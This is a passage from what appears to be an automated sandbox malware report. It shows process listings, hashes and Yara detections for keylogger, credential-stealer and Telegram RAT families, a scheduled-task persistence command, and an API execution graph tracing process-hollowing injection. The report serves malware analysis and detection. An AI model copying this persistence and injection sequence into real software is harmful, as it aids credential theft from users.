                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:16
                                                                                                                          Start time:12:51:09
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                          Imagebase:0x7ff7fb730000
                                                                                                                          File size:496'640 bytes
                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:17
                                                                                                                          Start time:12:51:10
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          Imagebase:0xa10000
                                                                                                                          File size:766'976 bytes
                                                                                                                          MD5 hash:3C70DF024FF5A65F0785B0075939C3FD
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 63%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:18
                                                                                                                          Start time:12:51:14
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"
                                                                                                                          Imagebase:0xf30000
                                                                                                                          File size:187'904 bytes
                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:19
                                                                                                                          Start time:12:51:14
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:20
                                                                                                                          Start time:12:51:14
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\aoTiGLRa.exe"
                                                                                                                          Imagebase:0xe80000
                                                                                                                          File size:766'976 bytes
                                                                                                                          MD5 hash:3C70DF024FF5A65F0785B0075939C3FD
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.3699672767.0000000003533000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:false

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:11.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:3.2%
                                                                                                                            Total number of Nodes:252
                                                                                                                            Total number of Limit Nodes:13
                                                                                                                            execution_graph 37332 7480368 37333 74803a2 37332->37333 37334 7480433 37333->37334 37338 7480460 37333->37338 37343 7480452 37333->37343 37335 7480429 37339 74808e5 37338->37339 37340 748048e 37338->37340 37339->37335 37340->37339 37348 7480d78 37340->37348 37355 7480d88 37340->37355 37345 7480454 37343->37345 37344 74808e5 37344->37335 37345->37344 37346 7480d78 2 API calls 37345->37346 37347 7480d88 2 API calls 37345->37347 37346->37344 37347->37344 37353 7480d78 CreateIconFromResourceEx 37348->37353 37354 7480d88 CreateIconFromResourceEx 37348->37354 37349 7480da2 37350 7480daf 37349->37350 37351 7480dc7 CreateIconFromResourceEx 37349->37351 37350->37339 37352 7480e56 37351->37352 37352->37339 37353->37349 37354->37349 37356 7480da2 37355->37356 37360 7480d78 CreateIconFromResourceEx 37355->37360 37361 7480d88 CreateIconFromResourceEx 37355->37361 37357 7480daf 37356->37357 37358 7480dc7 CreateIconFromResourceEx 37356->37358 37357->37339 37359 7480e56 37358->37359 37359->37339 37360->37356 37361->37356 37362 76f99df 37363 76f9684 37362->37363 37364 76f96ec 37363->37364 37368 76fbcf6 37363->37368 37383 76fbc90 37363->37383 37397 76fbc81 37363->37397 37369 76fbc84 37368->37369 37371 76fbcf9 37368->37371 37411 76fc1ab 37369->37411 37415 76fc18d 37369->37415 37423 76fc67e 37369->37423 37428 76fc09e 37369->37428 37432 76fc33e 37369->37432 37440 76fc443 37369->37440 37445 76fc5b4 37369->37445 37450 76fc936 37369->37450 37458 76fc1f7 37369->37458 37466 76fc2f7 37369->37466 37470 76fc5c8 37369->37470 37370 76fbcb2 37370->37364 37371->37364 37384 76fbcaa 37383->37384 37386 76fc33e 5 API calls 37384->37386 37387 76fc09e 2 API calls 37384->37387 37388 76fc67e 2 API calls 37384->37388 37389 76fc18d 5 API calls 37384->37389 37390 76fc1ab 2 API calls 37384->37390 37391 76fc5c8 2 API calls 37384->37391 37392 76fc2f7 2 API calls 37384->37392 37393 76fc1f7 4 API calls 37384->37393 37394 76fc936 5 API calls 37384->37394 37395 76fc5b4 2 API calls 37384->37395 37396 76fc443 2 API calls 37384->37396 37385 76fbcb2 37385->37364 37386->37385 37387->37385 37388->37385 37389->37385 37390->37385 37391->37385 37392->37385 37393->37385 37394->37385 37395->37385 37396->37385 37398 76fbc84 37397->37398 37400 76fc33e 5 API calls 37398->37400 37401 76fc09e 2 API calls 37398->37401 37402 76fc67e 2 API calls 37398->37402 37403 76fc18d 5 API calls 37398->37403 37404 76fc1ab 2 API calls 37398->37404 37405 76fc5c8 2 API calls 37398->37405 37406 76fc2f7 2 API calls 37398->37406 37407 76fc1f7 4 API calls 37398->37407 37408 76fc936 5 API calls 37398->37408 37409 76fc5b4 2 API calls 37398->37409 37410 76fc443 2 API calls 37398->37410 37399 76fbcb2 37399->37364 37400->37399 37401->37399 37402->37399 37403->37399 37404->37399 37405->37399 37406->37399 37407->37399 37408->37399 37409->37399 37410->37399 37474 76f8e48 37411->37474 37478 76f8e40 37411->37478 37412 76fc114 37412->37370 37416 76fc1a4 37415->37416 37417 76fc946 37416->37417 37482 76fcdb9 37416->37482 37487 76fce40 37416->37487 37496 76fcdc8 37416->37496 37501 76f8d98 37416->37501 37505 76f8d90 37416->37505 37424 76fc68e 37423->37424 37513 76f8fd8 37424->37513 37517 76f8fe0 37424->37517 37425 76fc9f1 37521 76f9268 37428->37521 37525 76f9267 37428->37525 37435 76fcdb9 2 API calls 37432->37435 37436 76fcdc8 2 API calls 37432->37436 37437 76fce40 3 API calls 37432->37437 37433 76fc33d 37433->37432 37434 76fc946 37433->37434 37438 76f8d98 ResumeThread 37433->37438 37439 76f8d90 ResumeThread 37433->37439 37435->37433 37436->37433 37437->37433 37438->37433 37439->37433 37441 76fc45b 37440->37441 37443 76f8fd8 WriteProcessMemory 37441->37443 37444 76f8fe0 WriteProcessMemory 37441->37444 37442 76fc490 37443->37442 37444->37442 37446 76fc5cb 37445->37446 37447 76fc5f0 37446->37447 37529 76f90c9 37446->37529 37533 76f90d0 37446->37533 37451 76fc946 37450->37451 37452 76fc33d 37450->37452 37452->37450 37453 76f8d98 ResumeThread 37452->37453 37454 76f8d90 ResumeThread 37452->37454 37455 76fcdb9 2 API calls 37452->37455 37456 76fcdc8 2 API calls 37452->37456 37457 76fce40 3 API calls 37452->37457 37453->37452 37454->37452 37455->37452 37456->37452 37457->37452 37537 76f8f18 37458->37537 37541 76f8f20 37458->37541 37459 76fc215 37460 76fc959 37459->37460 37462 76f8fd8 WriteProcessMemory 37459->37462 37463 76f8fe0 WriteProcessMemory 37459->37463 37460->37370 37461 76fc490 37462->37461 37463->37461 37468 76f8fd8 WriteProcessMemory 37466->37468 37469 76f8fe0 WriteProcessMemory 37466->37469 37467 76fc31e 37467->37370 37468->37467 37469->37467 37472 76f90c9 ReadProcessMemory 37470->37472 37473 76f90d0 ReadProcessMemory 37470->37473 37471 76fc5f0 37472->37471 37473->37471 37475 76f8e4b Wow64SetThreadContext 37474->37475 37477 76f8ed5 37475->37477 37477->37412 37479 76f8e44 Wow64SetThreadContext 37478->37479 37481 76f8ed5 37479->37481 37481->37412 37483 76fcdbc 37482->37483 37485 76f8e48 Wow64SetThreadContext 37483->37485 37486 76f8e40 Wow64SetThreadContext 37483->37486 37484 76fcdf3 37484->37416 37485->37484 37486->37484 37488 76fce44 37487->37488 37493 76fce46 37487->37493 37489 76fcddd 37488->37489 37488->37493 37494 76f8e48 Wow64SetThreadContext 37489->37494 37495 76f8e40 Wow64SetThreadContext 37489->37495 37490 76fcdf3 37490->37416 37491 76fcfdb 37491->37416 37493->37491 37509 76f5c60 37493->37509 37494->37490 37495->37490 37497 76fcddd 37496->37497 37499 76f8e48 Wow64SetThreadContext 37497->37499 37500 76f8e40 Wow64SetThreadContext 37497->37500 37498 76fcdf3 37498->37416 37499->37498 37500->37498 37502 76f8d9b ResumeThread 37501->37502 37504 76f8e09 37502->37504 37504->37416 37506 76f8d94 ResumeThread 37505->37506 37508 76f8e09 37506->37508 37508->37416 37510 76fd0d0 PostMessageW 37509->37510 37512 76fd13c 37510->37512 37512->37493 37514 76f8fe0 WriteProcessMemory 37513->37514 37516 76f907f 37514->37516 37516->37425 37518 76f9028 WriteProcessMemory 37517->37518 37520 76f907f 37518->37520 37520->37425 37522 76f92f1 CreateProcessA 37521->37522 37524 76f94b3 37522->37524 37526 76f9268 CreateProcessA 37525->37526 37528 76f94b3 37526->37528 37530 76f90d0 ReadProcessMemory 37529->37530 37532 76f915f 37530->37532 37532->37447 37534 76f911b ReadProcessMemory 37533->37534 37536 76f915f 37534->37536 37536->37447 37538 76f8f20 VirtualAllocEx 37537->37538 37540 76f8f9d 37538->37540 37540->37459 37542 76f8f60 VirtualAllocEx 37541->37542 37544 76f8f9d 37542->37544 37544->37459 37545 76f96dd 37546 76f9684 37545->37546 37547 76f96ec 37546->37547 37548 76fbcf6 13 API calls 37546->37548 37549 76fbc81 13 API calls 37546->37549 37550 76fbc90 13 API calls 37546->37550 37548->37547 37549->37547 37550->37547 37551 153d2e0 37552 153d326 GetCurrentProcess 37551->37552 37554 153d371 37552->37554 37555 153d378 GetCurrentThread 37552->37555 37554->37555 37556 153d3b5 GetCurrentProcess 37555->37556 37557 153d3ae 37555->37557 37558 153d3eb 37556->37558 37557->37556 37559 153d413 GetCurrentThreadId 37558->37559 37560 153d444 37559->37560 37328 7484690 37329 74846d3 37328->37329 37330 74846f1 MonitorFromPoint 37329->37330 37331 7484722 37329->37331 37330->37331 37561 153d528 DuplicateHandle 37562 153d5be 37561->37562 37563 1534668 37564 1534672 37563->37564 37568 1534769 37563->37568 37573 1533e34 37564->37573 37566 153468d 37569 153477d 37568->37569 37577 1534867 37569->37577 37581 1534868 37569->37581 37574 1533e3f 37573->37574 37576 1536f90 37574->37576 37589 1535ce0 37574->37589 37576->37566 37579 153488f 37577->37579 37578 153496c 37578->37578 37579->37578 37585 15344b4 37579->37585 37582 153488f 37581->37582 37583 15344b4 CreateActCtxA 37582->37583 37584 153496c 37582->37584 37583->37584 37586 15358f8 CreateActCtxA 37585->37586 37588 15359bb 37586->37588 37590 1535ceb 37589->37590 37593 1535d00 37590->37593 37592 153713d 37592->37576 37594 1535d0b 37593->37594 37597 1535d30 37594->37597 37596 153721a 37596->37592 37598 1535d3b 37597->37598 37601 1535d60 37598->37601 37600 153730d 37600->37596 37602 1535d6b 37601->37602 37604 153886b 37602->37604 37608 153ab12 37602->37608 37603 15388a9 37603->37600 37604->37603 37612 153cc10 37604->37612 37617 153cc00 37604->37617 37622 153af50 37608->37622 37625 153af36 37608->37625 37609 153ab26 37609->37604 37613 153cc31 37612->37613 37614 153cc55 37613->37614 37634 153d1c8 37613->37634 37638 153d1b9 37613->37638 37614->37603 37618 153cc10 37617->37618 37619 153cc55 37618->37619 37620 153d1b9 GetModuleHandleW 37618->37620 37621 153d1c8 GetModuleHandleW 37618->37621 37619->37603 37620->37619 37621->37619 37629 153b048 37622->37629 37623 153af5f 37623->37609 37626 153af4d 37625->37626 37627 153af5f 37626->37627 37628 153b048 GetModuleHandleW 37626->37628 37627->37609 37628->37627 37630 153b07c 37629->37630 37631 153b059 37629->37631 37630->37623 37631->37630 37632 153b280 GetModuleHandleW 37631->37632 37633 153b2ad 37632->37633 37633->37623 37636 153d1d5 37634->37636 37635 153d20f 37635->37614 37636->37635 37642 153cff0 37636->37642 37639 153d1c8 37638->37639 37640 153cff0 GetModuleHandleW 37639->37640 37641 153d20f 37639->37641 37640->37641 37641->37614 37643 153cffb 37642->37643 37645 153db20 37643->37645 37646 153d10c 37643->37646 37645->37645 37647 153d117 37646->37647 37648 1535d60 GetModuleHandleW 37647->37648 37649 153db8f 37648->37649 37649->37645
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (oq$4'q$4'q$4'q$4'q$4'q$4'q$4|q$4|q$$q
                                                                                                                            • API String ID: 0-1265471490
                                                                                                                            • Opcode ID: 8941d5b37ac9bb38ee5d36dfa99affea197690495eeb65815f867750b664353b
                                                                                                                            • Instruction ID: 9200155beab2041dc5961c1357e4688df35897e7d3cd5da5709603154a52af0a
                                                                                                                            • Opcode Fuzzy Hash: 8941d5b37ac9bb38ee5d36dfa99affea197690495eeb65815f867750b664353b
                                                                                                                            • Instruction Fuzzy Hash: 3743FCB4A00219CFDB64EF68C988ADDB7B6BF49310F15819AD509AB361CB74ED81CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1064 748bac8-748bae9 1065 748baeb 1064->1065 1066 748baf0-748bbdc 1064->1066 1065->1066 1068 748bbe2-748bd33 1066->1068 1069 748c404-748c42c 1066->1069 1113 748bd39-748bd94 1068->1113 1114 748c3d2-748c401 1068->1114 1072 748cb09-748cb12 1069->1072 1074 748cb18-748cb2f 1072->1074 1075 748c43a-748c443 1072->1075 1077 748c44a-748c52b 1075->1077 1078 748c445 1075->1078 1094 748c531-748c53e 1077->1094 1078->1077 1096 748c568 1094->1096 1097 748c540-748c54c 1094->1097 1100 748c56e-748c58e 1096->1100 1098 748c54e-748c554 1097->1098 1099 748c556-748c55c 1097->1099 1101 748c566 1098->1101 1099->1101 1105 748c5ee-748c664 1100->1105 1106 748c590-748c5e9 1100->1106 1101->1100 1125 748c6b9-748c6fc call 748b670 1105->1125 1126 748c666-748c6b7 1105->1126 1119 748cb06 1106->1119 1122 748bd99-748bda4 1113->1122 1123 748bd96 1113->1123 1114->1069 1119->1072 1124 748c2e8-748c2ee 1122->1124 1123->1122 1128 748bda9-748bdc7 1124->1128 1129 748c2f4-748c371 1124->1129 1153 748c707-748c70d 1125->1153 1126->1153 1131 748bdc9-748bdcd 1128->1131 1132 748be1e-748be33 1128->1132 1170 748c3be-748c3c4 1129->1170 1131->1132 1136 748bdcf-748bdda 1131->1136 1137 748be3a-748be50 1132->1137 1138 748be35 1132->1138 1140 748be10-748be16 1136->1140 1142 748be52 1137->1142 1143 748be57-748be6e 1137->1143 1138->1137 1147 748be18-748be19 1140->1147 1148 748bddc-748bde0 1140->1148 1142->1143 1145 748be70 1143->1145 1146 748be75-748be8b 1143->1146 1145->1146 1151 748be8d 1146->1151 1152 748be92-748be99 1146->1152 1154 748be9c-748bf0d 1147->1154 1149 748bde2 1148->1149 1150 748bde6-748bdfe 1148->1150 1149->1150 1157 748be00 1150->1157 1158 748be05-748be0d 1150->1158 1151->1152 1152->1154 1159 748c764-748c770 1153->1159 1160 748bf0f 1154->1160 1161 748bf23-748c09b 1154->1161 1157->1158 1158->1140 1163 748c70f-748c731 1159->1163 1164 748c772-748c7fa 1159->1164 1160->1161 1162 748bf11-748bf1d 1160->1162 1171 748c09d 1161->1171 1172 748c0b1-748c1ec 1161->1172 1162->1161 1166 748c738-748c761 1163->1166 1167 748c733 1163->1167 1193 748c97b-748c984 1164->1193 1166->1159 1167->1166 1174 748c373-748c3bb 1170->1174 1175 748c3c6 1170->1175 1171->1172 1176 748c09f-748c0ab 1171->1176 1183 748c1ee-748c1f2 1172->1183 1184 748c250-748c265 1172->1184 1174->1170 1175->1114 1176->1172 1183->1184 1188 748c1f4-748c203 1183->1188 1186 748c26c-748c28d 1184->1186 1187 748c267 1184->1187 1190 748c28f 1186->1190 1191 748c294-748c2b3 1186->1191 1187->1186 1192 748c242-748c248 1188->1192 1190->1191 1197 748c2ba-748c2da 1191->1197 1198 748c2b5 1191->1198 1199 748c24a-748c24b 1192->1199 1200 748c205-748c209 1192->1200 1195 748c98a-748c9e5 1193->1195 1196 748c7ff-748c814 1193->1196 1222 748ca1c-748ca46 1195->1222 1223 748c9e7-748ca1a 1195->1223 1203 748c81d-748c969 1196->1203 1204 748c816 1196->1204 1205 748c2dc 1197->1205 1206 748c2e1 1197->1206 1198->1197 1207 748c2e5 1199->1207 1201 748c20b-748c20f 1200->1201 1202 748c213-748c234 1200->1202 1201->1202 1209 748c23b-748c23f 1202->1209 1210 748c236 1202->1210 1224 748c975 1203->1224 1204->1203 1211 748c8ab-748c8eb 1204->1211 1212 748c8f0-748c930 1204->1212 1213 748c823-748c861 1204->1213 1214 748c866-748c8a6 1204->1214 1205->1206 1206->1207 1207->1124 1209->1192 1210->1209 1211->1224 1212->1224 1213->1224 1214->1224 1231 748ca4f-748caff 1222->1231 1223->1231 1224->1193 1231->1119
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'q$<ov!$TJq$Teq$pq$xbq
                                                                                                                            • API String ID: 0-613785864
                                                                                                                            • Opcode ID: fff5896d8f77de7329b2f13c34234fff4e110a18df551b2b498795ae03b747db
                                                                                                                            • Instruction ID: aee791b3b85ec31dfe883751e04419bfa23a6285b1cae1c358a5d629613b2fd3
                                                                                                                            • Opcode Fuzzy Hash: fff5896d8f77de7329b2f13c34234fff4e110a18df551b2b498795ae03b747db
                                                                                                                            • Instruction Fuzzy Hash: 81B2B274E00229CFDB64DF69C984ADDBBB2BF89304F1581E9D509AB225DB319E81CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1236 7480460-7480488 1237 748096b-74809d4 1236->1237 1238 748048e-7480493 1236->1238 1244 74809db-7480a63 1237->1244 1238->1237 1239 7480499-74804b6 1238->1239 1239->1244 1245 74804bc-74804c0 1239->1245 1282 7480a6e-7480aee 1244->1282 1247 74804cf-74804d3 1245->1247 1248 74804c2-74804cc 1245->1248 1250 74804e2-74804e9 1247->1250 1251 74804d5-74804df 1247->1251 1248->1247 1254 74804ef-748051f 1250->1254 1255 7480604-7480609 1250->1255 1251->1250 1266 7480cee-7480d14 1254->1266 1268 7480525-74805f8 1254->1268 1258 748060b-748060f 1255->1258 1259 7480611-7480616 1255->1259 1258->1259 1261 7480618-748061c 1258->1261 1262 7480628-7480658 1259->1262 1261->1266 1267 7480622-7480625 1261->1267 1262->1282 1283 748065e-7480661 1262->1283 1275 7480d24 1266->1275 1276 7480d16-7480d22 1266->1276 1267->1262 1268->1255 1291 74805fa 1268->1291 1277 7480d27-7480d2c 1275->1277 1276->1277 1299 7480af5-7480b77 1282->1299 1283->1282 1286 7480667-7480669 1283->1286 1286->1282 1288 748066f-74806a4 1286->1288 1298 74806aa-74806b3 1288->1298 1288->1299 1291->1255 1301 74806b9-7480713 1298->1301 1302 7480816-748081a 1298->1302 1304 7480b7f-7480c01 1299->1304 1340 7480725 1301->1340 1341 7480715-748071e 1301->1341 1302->1304 1305 7480820-7480824 1302->1305 1308 7480c09-7480c36 1304->1308 1305->1308 1309 748082a-7480830 1305->1309 1319 7480c3d-7480cbd 1308->1319 1310 7480832 1309->1310 1311 7480834-7480869 1309->1311 1314 7480870-7480876 1310->1314 1311->1314 1318 748087c-7480884 1314->1318 1314->1319 1324 748088b-748088d 1318->1324 1325 7480886-748088a 1318->1325 1375 7480cc4-7480ce6 1319->1375 1330 74808ef-74808f5 1324->1330 1331 748088f-74808b3 1324->1331 1325->1324 1336 7480914-7480942 1330->1336 1337 74808f7-7480912 1330->1337 1361 74808bc-74808c0 1331->1361 1362 74808b5-74808ba 1331->1362 1357 748094a-7480956 1336->1357 1337->1357 1347 7480729-748072b 1340->1347 1341->1347 1348 7480720-7480723 1341->1348 1353 748072d 1347->1353 1354 7480732-7480736 1347->1354 1348->1347 1353->1354 1359 7480738-748073f 1354->1359 1360 7480744-748074a 1354->1360 1374 748095c-7480968 1357->1374 1357->1375 1368 74807e1-74807e5 1359->1368 1371 748074c-7480752 1360->1371 1372 7480754-7480759 1360->1372 1361->1266 1367 74808c6-74808c9 1361->1367 1370 74808cc-74808dd 1362->1370 1367->1370 1376 7480804-7480810 1368->1376 1377 74807e7-7480801 1368->1377 1412 74808df call 7480d78 1370->1412 1413 74808df call 7480d88 1370->1413 1378 748075f-7480765 1371->1378 1372->1378 1375->1266 1376->1301 1376->1302 1377->1376 1381 748076b-7480770 1378->1381 1382 7480767-7480769 1378->1382 1387 7480772-7480784 1381->1387 1382->1387 1385 74808e5-74808ed 1385->1357 1392 748078e-7480793 1387->1392 1393 7480786-748078c 1387->1393 1395 7480799-74807a0 1392->1395 1393->1395 1400 74807a2-74807a4 1395->1400 1401 74807a6 1395->1401 1403 74807ab-74807b6 1400->1403 1401->1403 1404 74807b8-74807bb 1403->1404 1405 74807da 1403->1405 1404->1368 1407 74807bd-74807c3 1404->1407 1405->1368 1408 74807ca-74807d3 1407->1408 1409 74807c5-74807c8 1407->1409 1408->1368 1411 74807d5-74807d8 1408->1411 1409->1405 1409->1408 1411->1368 1411->1405 1412->1385 1413->1385
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Hq$Hq$Hq$Hq$Hq
                                                                                                                            • API String ID: 0-3799487529
                                                                                                                            • Opcode ID: 02bb66c0834f3787350ba396f01b9910540b99bc28108a58fcc173b94552414c
                                                                                                                            • Instruction ID: 3e8c7467c90c658999773dcd73739e467da9d752c06338b277a917d9d88a6818
                                                                                                                            • Opcode Fuzzy Hash: 02bb66c0834f3787350ba396f01b9910540b99bc28108a58fcc173b94552414c
                                                                                                                            • Instruction Fuzzy Hash: AA3260B0E102198FDB54EFA9C4547AEBBF2BF85300F14846AD409AB395DB349D89CF91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2cbb41bfe54df55603c620a00c9513ac4179e0f7ba6070f2c450bc4afe398867
                                                                                                                            • Instruction ID: 480881b610afa0cb327e63a0ec3c92579e1b1e3c17314ab5243f47c37502e0aa
                                                                                                                            • Opcode Fuzzy Hash: 2cbb41bfe54df55603c620a00c9513ac4179e0f7ba6070f2c450bc4afe398867
                                                                                                                            • Instruction Fuzzy Hash: 2FE16BB1B016169FEB29DB75C460BAEB7F6AFC8600F14846DE246DB3A0CB35E901C751
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 638c7550a5df91c5c348a51de999deea178d66440d57c53d698ee067d1b3807f
                                                                                                                            • Instruction ID: 1f955070872a3dafa272852bbf450ee65bac19993997536728bef51f6a914513
                                                                                                                            • Opcode Fuzzy Hash: 638c7550a5df91c5c348a51de999deea178d66440d57c53d698ee067d1b3807f
                                                                                                                            • Instruction Fuzzy Hash: F6C16CB1E102098FDF64DF65C88479EBBB2BF89310F14C16AD419AB265EB70D989CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1510 153d2d0-153d36f GetCurrentProcess 1515 153d371-153d377 1510->1515 1516 153d378-153d3ac GetCurrentThread 1510->1516 1515->1516 1517 153d3b5-153d3e9 GetCurrentProcess 1516->1517 1518 153d3ae-153d3b4 1516->1518 1519 153d3f2-153d40d call 153d4b0 1517->1519 1520 153d3eb-153d3f1 1517->1520 1518->1517 1524 153d413-153d442 GetCurrentThreadId 1519->1524 1520->1519 1525 153d444-153d44a 1524->1525 1526 153d44b-153d4ad 1524->1526 1525->1526
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0153D35E
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0153D39B
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0153D3D8
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0153D431
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2063062207-0
                                                                                                                            • Opcode ID: 7b964217f258bcab8a61f0793a351855307156b940bf7ab53b87db67952ee4b5
                                                                                                                            • Instruction ID: 50eee2122ca98083c75c990af0866c404ea8b7e2c9ec678e7d29aa97819b9834
                                                                                                                            • Opcode Fuzzy Hash: 7b964217f258bcab8a61f0793a351855307156b940bf7ab53b87db67952ee4b5
                                                                                                                            • Instruction Fuzzy Hash: CE5134B1901749CFEB14CFAAD548B9EBBF1FF88314F208459E409AB350D774A944CB66

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1533 153d2e0-153d36f GetCurrentProcess 1537 153d371-153d377 1533->1537 1538 153d378-153d3ac GetCurrentThread 1533->1538 1537->1538 1539 153d3b5-153d3e9 GetCurrentProcess 1538->1539 1540 153d3ae-153d3b4 1538->1540 1541 153d3f2-153d40d call 153d4b0 1539->1541 1542 153d3eb-153d3f1 1539->1542 1540->1539 1546 153d413-153d442 GetCurrentThreadId 1541->1546 1542->1541 1547 153d444-153d44a 1546->1547 1548 153d44b-153d4ad 1546->1548 1547->1548
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0153D35E
